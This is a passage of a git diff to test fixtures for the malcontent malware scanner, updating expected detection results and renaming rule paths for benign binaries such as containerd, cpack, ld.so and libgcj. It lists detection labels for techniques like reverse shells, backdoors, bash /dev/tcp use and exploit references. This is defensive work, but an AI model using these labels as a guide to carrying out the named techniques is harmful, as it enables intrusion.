[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) |
+| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
+| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
 | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
 | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
-| LOW | [evasion/hidden_paths/relative_hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/relative-hidden.yara#relative_hidden_launcher) | relative hidden launcher | [./.691.9B](https://github.com/search?q=.%2F.691.9B&type=code)
[bash](https://github.com/search?q=bash&type=code)
[exec](https://github.com/search?q=exec&type=code)
[system](https://github.com/search?q=system&type=code) |
 | LOW | [evasion/hijack_execution/LD_LIBRARY_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hijack_execution/LD_LIBRARY_PATH.yara#ld_library_path) | ld library path | [LD_LIBRARY_PATH](https://github.com/search?q=LD_LIBRARY_PATH&type=code) |
 | LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [LANG](https://github.com/search?q=LANG&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
 | LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) |
@@ -136,7 +139,6 @@
 | LOW | [fs/tempdir/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir-create.yara#mkdtemp) | creates temporary directory | [mkdtemp](https://github.com/search?q=mkdtemp&type=code)
[temp dir](https://github.com/search?q=temp+dir&type=code) |
 | LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) |
 | LOW | [hw/wireless](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/wireless.yara#bssid) | wireless network base station ID | [BSSID](https://github.com/search?q=BSSID&type=code) |
-| LOW | [impact/exploit/GCONV_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/exploit/GCONV_PATH.yara#gconv_path) | references character conversion configuration | [GCONV_PATH](https://github.com/search?q=GCONV_PATH&type=code) |
 | LOW | [impact/ui/screen_capture](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/ui/screen-capture.yara#macos_screen_capture) | macos screen capture | [captureScreen](https://github.com/search?q=captureScreen&type=code) |
 | LOW | [net/dns](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns.yara#go_dns_refs) | Uses DNS (Domain Name Service) | [require('dns')](https://github.com/search?q=require%28%27dns%27%29&type=code) |
 | LOW | [net/dns/servers](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-servers.yara#go_dns_refs_local) | Examines local DNS servers | [resolv.conf](https://github.com/search?q=resolv.conf&type=code) |
@@ -170,7 +172,5 @@
 | LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) |
 | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) |
 | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) |
-| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
-| LOW | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [Uses glibc thread local storage](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) |
 | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) |
diff --git a/tests/linux/clean/containerd.simple b/tests/linux/clean/containerd.simple
index 6c40382aa..74979278e 100644
--- a/tests/linux/clean/containerd.simple
+++ b/tests/linux/clean/containerd.simple
@@ -2,7 +2,7 @@
 3P/threat_hunting/hijacker: medium
 3P/threat_hunting/privilegeescalation: medium
 c2/addr/ip: medium
-c2/server_address: medium
+c2/addr/server: medium
 collect/archives/zip: medium
 collect/databases/mysql: medium
 credential/password: low
@@ -23,13 +23,13 @@ data/encoding/json: low
 data/encoding/json_decode: low
 data/hash/md5: low
 discover/network/mac_address: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: medium
 discover/user/USER: low
-evasion/covert_location/dev_mqueue: medium
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/var_run: medium
+evasion/file/location/dev_mqueue: medium
+evasion/file/location/dev_shm: medium
+evasion/file/location/var_run: medium
 evasion/process_injection/ptrace: medium
 exec/plugin: low
 exec/program: medium
@@ -94,7 +94,6 @@ net/ip/icmp: medium
 net/ip/multicast_send: low
 net/ip/parse: medium
 net/ip/send_unicast: low
-net/ip/spoof: medium
 net/resolve/hostname: low
 net/socket/listen: medium
 net/socket/local_addr: low
diff --git a/tests/linux/clean/cpack.md b/tests/linux/clean/cpack.md
index f81da4983..ca1168f2f 100644
--- a/tests/linux/clean/cpack.md
+++ b/tests/linux/clean/cpack.md
@@ -2,7 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_http_url_with_question) | contains hardcoded endpoint with a question mark | 
[https://jrsoftware.org/isinfo.php?](https://jrsoftware.org/isinfo.php?) | +| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_url_with_question) | binary contains hardcoded URL with question mark | [https://jrsoftware.org/isinfo.php?](https://jrsoftware.org/isinfo.php?) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[use_port](https://github.com/search?q=use_port&type=code) | | MEDIUM | [crypto/file_encrypter](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/file-encrypter.yara#file_crypter) | Encrypts files | [cryptor](https://github.com/search?q=cryptor&type=code) | | MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | @@ -11,7 +11,7 @@ | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code) | | MEDIUM | [discover/processes/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/processes/list.yara#ps_exec) | ps exec | [#!](https://github.com/search?q=%23%21&type=code)
[ps ax](https://github.com/search?q=ps+ax&type=code) | | MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#os_release) | [operating-system identification](https://developer.apple.com/documentation/os/1524245-os_release) | [os_release](https://github.com/search?q=os_release&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [N_125cmFunctionFunctionBlocker16StartCommandNameEv](https://github.com/search?q=N_125cmFunctionFunctionBlocker16StartCommandNameEv&type=code)
[StartupCommands](https://github.com/search?q=StartupCommands&type=code)
[_N_122cmBlockFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_N_122cmBlockFunctionBlocker16StartCommandNameEv&type=code)
[_N_122cmMacroFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_N_122cmMacroFunctionBlocker16StartCommandNameEv&type=code)
[_N_124cmForEachFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_N_124cmForEachFunctionBlocker16StartCommandNameEv&type=code)
[_ZN13cmSystemTools23s_RunCommandHideConsoleE](https://github.com/search?q=_ZN13cmSystemTools23s_RunCommandHideConsoleE&type=code)
[_ZN13cmSystemTools25s_DisableRunCommandOutputE](https://github.com/search?q=_ZN13cmSystemTools25s_DisableRunCommandOutputE&type=code)
[_ZNK19cmIfFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_ZNK19cmIfFunctionBlocker16StartCommandNameEv&type=code)
[_ZNK22cmWhileFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_ZNK22cmWhileFunctionBlocker16StartCommandNameEv&type=code)
[_ZZN12_GLOBAL__N_117TryRunCommandImpl18DoNotRunExecutableERKNSt7_](https://github.com/search?q=_ZZN12_GLOBAL__N_117TryRunCommandImpl18DoNotRunExecutableERKNSt7_&type=code)
[cmExecuteCommand](https://github.com/search?q=cmExecuteCommand&type=code) | | MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | @@ -30,6 +30,7 @@ | MEDIUM | [fs/proc/meminfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/meminfo.yara#proc_meminfo_val) | get memory info | [/proc/meminfo](https://github.com/search?q=%2Fproc%2Fmeminfo&type=code) | | MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | | MEDIUM | [impact/remote_access/crypto_listen_socks](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/crypto_listen_socks.yara#socks_crypto_listener) | socks crypto listener | [SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socks5](https://github.com/search?q=socks5&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[Port](https://github.com/search?q=Port&type=code)
[Target](https://github.com/search?q=Target&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/dns/over_https](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-over-https.yara#doh_refs) | Supports DNS (Domain Name Service) over HTTPS | [application/dns-message](https://github.com/search?q=application%2Fdns-message&type=code) | | MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [CPACK_DOWNLOAD_ALL](https://github.com/search?q=CPACK_DOWNLOAD_ALL&type=code)
[CPACK_DOWNLOAD_SITE](https://github.com/search?q=CPACK_DOWNLOAD_SITE&type=code)
[CPACK_IFW_DOWNLOAD_ALL](https://github.com/search?q=CPACK_IFW_DOWNLOAD_ALL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_COUNT_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_COUNT_INTERNAL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_HASHES_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_HASHES_INTERNAL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_URLS_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_URLS_INTERNAL&type=code)
[CPACK_USES_DOWNLOAD](https://github.com/search?q=CPACK_USES_DOWNLOAD&type=code)
[Call DownloadFile](https://github.com/search?q=Call+DownloadFile&type=code)
[DOWNLOAD HASH mismatch](https://github.com/search?q=DOWNLOAD+HASH+mismatch&type=code)
[DOWNLOAD cannot set TLS](https://github.com/search?q=DOWNLOAD+cannot+set+TLS&type=code)
[DOWNLOAD cannot set http](https://github.com/search?q=DOWNLOAD+cannot+set+http&type=code)
[DOWNLOAD cannot set url](https://github.com/search?q=DOWNLOAD+cannot+set+url&type=code)
[DOWNLOAD cannot set user](https://github.com/search?q=DOWNLOAD+cannot+set+user&type=code)
[DOWNLOAD error](https://github.com/search?q=DOWNLOAD+error&type=code)
[DOWNLOAD missing ALGO](https://github.com/search?q=DOWNLOAD+missing+ALGO&type=code)
[DOWNLOAD missing VAR for](https://github.com/search?q=DOWNLOAD+missing+VAR+for&type=code)
[Maxdownload](https://github.com/search?q=Maxdownload&type=code)
[VERIFY_DOWNLOADS](https://github.com/search?q=VERIFY_DOWNLOADS&type=code)
[_DOWNLOADED](https://github.com/search?q=_DOWNLOADED&type=code)
[completely downloaded](https://github.com/search?q=completely+downloaded&type=code)
[compute hash on downloaded file](https://github.com/search?q=compute+hash+on+downloaded+file&type=code)
[cw_download_write](https://github.com/search?q=cw_download_write&type=code)
[download_write body](https://github.com/search?q=download_write+body&type=code)
[download_write header](https://github.com/search?q=download_write+header&type=code)
[for the URL download method](https://github.com/search?q=for+the+URL+download+method&type=code)
[hash on failed download](https://github.com/search?q=hash+on+failed+download&type=code)
[is already downloaded](https://github.com/search?q=is+already+downloaded&type=code)
[isDownloaded](https://github.com/search?q=isDownloaded&type=code)
[maxdownload](https://github.com/search?q=maxdownload&type=code)
[partial download completed](https://github.com/search?q=partial+download+completed&type=code)
[protected CPackDownloadArchives](https://github.com/search?q=protected+CPackDownloadArchives&type=code)
[protected CPackDownloadComponents](https://github.com/search?q=protected+CPackDownloadComponents&type=code)
[protected CPackDownloadCount](https://github.com/search?q=protected+CPackDownloadCount&type=code)
[protected CPackDownloadHashes](https://github.com/search?q=protected+CPackDownloadHashes&type=code)
[protected CPackDownloadUrls](https://github.com/search?q=protected+CPackDownloadUrls&type=code)
[skipping download as file already](https://github.com/search?q=skipping+download+as+file+already&type=code)
[t resume download](https://github.com/search?q=t+resume+download&type=code) | | MEDIUM | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_value) | Invokes curl to download a file | [curl due to a build-time decision.](https://github.com/search?q=curl+due+to+a+build-time+decision.&type=code)
[curl function was given a bad argument](https://github.com/search?q=curl+function+was+given+a+bad+argument&type=code)
[curl is built without the HTTPS-proxy support.](https://github.com/search?q=curl+is+built+without+the+HTTPS-proxy+support.&type=code)
[curl lacks IDN support](https://github.com/search?q=curl+lacks+IDN+support&type=code)
[curl offers](https://github.com/search?q=curl+offers&type=code)
[curl understands](https://github.com/search?q=curl+understands&type=code)
[curl user interface](https://github.com/search?q=curl+user+interface&type=code) | @@ -56,8 +57,8 @@ | LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [MD5_Final](https://github.com/search?q=MD5_Final&type=code)
[MD5_Init](https://github.com/search?q=MD5_Init&type=code)
[MD5_Update](https://github.com/search?q=MD5_Update&type=code) | | LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | -| LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | -| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | +| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [LANG](https://github.com/search?q=LANG&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
diff --git a/tests/linux/clean/default_config.json.simple b/tests/linux/clean/default_config.json.simple
index 92c43b7f1..4d372b2a0 100644
--- a/tests/linux/clean/default_config.json.simple
+++ b/tests/linux/clean/default_config.json.simple
@@ -20,16 +20,16 @@ data/compression/bzip2: low
 data/compression/lzma: low
 data/compression/zstd: low
 data/encoding/base64: low
-discover/system/network: high
+discover/multiple: medium
+discover/system/dmesg: low
 discover/system/platform: low
 discover/user/name_get: medium
 evasion/bypass_security/linux/iptables: medium
 evasion/bypass_security/linux/ufw: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 evasion/logging/acct: low
 evasion/process_injection/readelf: medium
 exec/plugin: low
-exec/shell/bash_dev_tcp: high
 exec/shell/bash_dev_udp: medium
 exec/shell/nohup: medium
 exec/system_controls/apparmor: medium
@@ -55,6 +55,7 @@ impact/exploit/cve: medium
 impact/remote_access/iptables: medium
 net/dns/servers: low
 net/download: medium
+net/ftp/t: low
 net/http/cookies: medium
 net/socket/connect: medium
 net/tcp/sftp: medium
diff --git a/tests/linux/clean/emscripten.sh.simple b/tests/linux/clean/emscripten.sh.simple
index c52f451b3..08f914c03 100644
--- a/tests/linux/clean/emscripten.sh.simple
+++ b/tests/linux/clean/emscripten.sh.simple
@@ -1,6 +1,6 @@
 # linux/clean/emscripten.sh: medium
 c2/tool_transfer/shell: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 fs/file/delete: medium
 fs/file/delete_forcibly: low
 fs/file/make_executable: medium
diff --git a/tests/linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json.simple b/tests/linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json.simple
index e5fa47d26..da76501a0 100644
--- a/tests/linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json.simple
+++ b/tests/linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json.simple
@@ -1,7 +1,7 @@
 # linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json: high
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/dev_shm: low
-evasion/hidden_paths/hidden: high
+evasion/file/location/dev_shm: medium
+evasion/file/prefix: high
+evasion/file/prefix/dev: low
 exec/shell/command: medium
 fs/path/etc: low
 fs/path/etc_initd: medium
diff --git a/tests/linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json.simple b/tests/linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json.simple
index 2fcc182fe..43b73b57d 100644
--- a/tests/linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json.simple
+++ b/tests/linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json.simple
@@ -1,7 +1,6 @@
 # linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json: medium
 3P/threat_hunting/seclists: medium
 impact/exploit: medium
-impact/exploit/GCONV_PATH: low
 impact/exploit/cve: medium
 impact/exploit/pwnkit: low
 impact/remote_access/agent: medium
diff --git a/tests/linux/clean/kibana/cde1bafa-9f01-4f43-a872-605b678968b0_111.json.simple b/tests/linux/clean/kibana/cde1bafa-9f01-4f43-a872-605b678968b0_111.json.simple
index c1ebf94c1..ee2b6461a 100644
--- a/tests/linux/clean/kibana/cde1bafa-9f01-4f43-a872-605b678968b0_111.json.simple
+++ b/tests/linux/clean/kibana/cde1bafa-9f01-4f43-a872-605b678968b0_111.json.simple
@@ -52,7 +52,7 @@ exec/shell/command: medium
 exec/shell/power: medium
 exfil/collection: medium
 impact/infection/infected: medium
-impact/remote_access/backdoor: high
+impact/remote_access/backdoor: medium
 impact/remote_access/implant: medium
 impact/remote_access/reverse_shell: high
 net/dns/txt: low
diff --git a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple
index 7628d3546..cb294eb02 100644
--- a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple
+++ b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple
@@ -52,7 +52,10 @@ data/encoding/json_decode: low
 data/encoding/json_encode: low
 data/hash/md5: low
 discover/network/mac_address: medium
-evasion/hidden_paths/hidden: medium
+discover/process/name: medium
+discover/process/parent: low
+evasion/file/prefix: medium
+evasion/rootkit/refs: medium
 exec/cmd: medium
 exec/plugin: low
 exec/shell/power: medium
@@ -69,13 +72,11 @@ impact/exploit/known_s: medium
 impact/exploit/overflow_shellcode: high
 impact/infection/infected: medium
 impact/infection/worm: medium
-impact/remote_access/backdoor: high
-impact/remote_access/botnet: medium
+impact/remote_access/backdoor: medium
 impact/remote_access/iptables: medium
 impact/remote_access/reverse_shell: high
 impact/remote_access/trojan: medium
 impact/rootkit: low
-impact/rootkit/refs: medium
 lateral/scan/brute_force: low
 net/dns/txt: low
 net/download: medium
@@ -91,8 +92,6 @@ net/url/request: medium
 os/kernel/seccomp: low
 persist/daemon: medium
 process/chroot: low
-process/name_get: medium
-process/parent_pid_get: low
 sec-tool/net/masscan: high
 sec-tool/net/nmap: medium
 sec-tool/pentest/metasploit_ref: medium
diff --git a/tests/linux/clean/kuma-cp.simple b/tests/linux/clean/kuma-cp.simple
index ce32d7bad..34eb70185 100644
--- a/tests/linux/clean/kuma-cp.simple
+++ b/tests/linux/clean/kuma-cp.simple
@@ -3,7 +3,7 @@
 3P/threat_hunting/privilegeescalation: medium
 c2/addr/http_dynamic: medium
 c2/addr/ip: medium
-c2/server_address: medium
+c2/addr/server: medium
 c2/tool_transfer/download: medium
 collect/archives/zip: medium
 collect/databases/mysql: medium
@@ -33,16 +33,17 @@ discover/network/interface_list: medium
 discover/network/mac_address: medium
 discover/network/netstat: medium
 discover/processes/list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/dmesg: low
+discover/system/hostname: low
 discover/system/platform: medium
 discover/user/HOME: low
 discover/user/USER: low
 discover/user/name_get: medium
 evasion/bypass_security/linux/iptables: medium
 evasion/bypass_security/linux/se: medium
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/var_run: medium
+evasion/file/location/var_run: medium
+evasion/file/prefix: medium
 exec/cmd: medium
 exec/conditional/LANG: low
 exec/plugin: low
diff --git a/tests/linux/clean/ld-2.27.so.simple b/tests/linux/clean/ld-2.27.so.simple
index ed8d10b80..d35fb32aa 100644
--- a/tests/linux/clean/ld-2.27.so.simple
+++ b/tests/linux/clean/ld-2.27.so.simple
@@ -1,6 +1,8 @@
 # linux/clean/ld-2.27.so: medium
 anti-behavior/LD_DEBUG: medium
 anti-behavior/LD_PROFILE: medium
+discover/process/runtime_deps: medium
+discover/system/dev_full: low
 evasion/hijack_execution/LD_LIBRARY_PATH: low
 evasion/hijack_execution/etc_ld.so.preload: medium
 fs/path/etc: low
@@ -9,8 +11,6 @@ fs/path/var_profile: medium
 fs/proc/self_exe: medium
 fs/proc/sys_kernel_osrelease: medium
 fs/tempdir: low
-impact/exploit/GCONV_PATH: low
 net/url/embedded: low
 persist/shell/bash: medium
-process/thread_local_storage: low
 sus/exclamation: medium
diff --git a/tests/linux/clean/libgcj.so.17.0.0.simple b/tests/linux/clean/libgcj.so.17.0.0.simple
index 33fc594bd..b2dee9151 100644
--- a/tests/linux/clean/libgcj.so.17.0.0.simple
+++ b/tests/linux/clean/libgcj.so.17.0.0.simple
@@ -1,4 +1,4 @@
-# linux/clean/libgcj.so.17.0.0: high
+# linux/clean/libgcj.so.17.0.0: medium
 3P/JPCERT/cobaltstrike_v3v4: medium
 c2/addr/ip: medium
 credential/password: low
@@ -18,8 +18,9 @@ data/hash/sha1: low
 data/hash/sha256: low
 data/hash/whirlpool: medium
 discover/network/interface_list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/process/name: medium
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
@@ -50,7 +51,6 @@ fs/path/var: low
 fs/permission/modify: medium
 fs/proc/arbitrary_pid: medium
 fs/proc/mounts: medium
-fs/proc/pid_exe: high
 fs/proc/stat: medium
 fs/tempdir: low
 fs/tempdir/TEMP: low
@@ -82,7 +82,6 @@ net/url/embedded: low
 net/url/encode: medium
 net/url/parse: low
 process/multithreaded: low
-process/name_get: medium
 sus/exclamation: medium
 sus/intercept: medium
 sus/leetspeak: medium
diff --git a/tests/linux/clean/libgcj.so.17.simple b/tests/linux/clean/libgcj.so.17.simple
index 475b6f7dd..86be6e324 100644
--- a/tests/linux/clean/libgcj.so.17.simple
+++ b/tests/linux/clean/libgcj.so.17.simple
@@ -1,4 +1,4 @@
-# linux/clean/libgcj.so.17: high
+# linux/clean/libgcj.so.17: medium
 3P/JPCERT/cobaltstrike_v3v4: medium
 c2/addr/ip: medium
 credential/password: low
